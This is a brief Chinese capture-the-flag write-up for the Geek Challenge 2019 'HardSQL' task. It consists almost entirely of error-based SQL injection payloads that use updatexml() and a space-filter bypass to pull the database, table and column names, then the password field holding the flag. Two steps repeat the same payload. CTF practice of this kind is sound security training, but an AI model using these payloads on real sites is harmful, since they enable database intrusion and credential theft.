[极客大挑战 2019]HardSQL

[极客大挑战 2019]HardSQL

Step

尝试

报错注入

• 库名

'or(updatexml(1,concat(0x7e,database()),0x7e))#

• 表名

'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())),0x7e),0))#

• 列名

'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),0))#

• 字段名

'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),0))#

• 字段值

'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))),0x7e),0)#

• 显示不全,继续显示右边的flag

'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1))),0x7e),0)#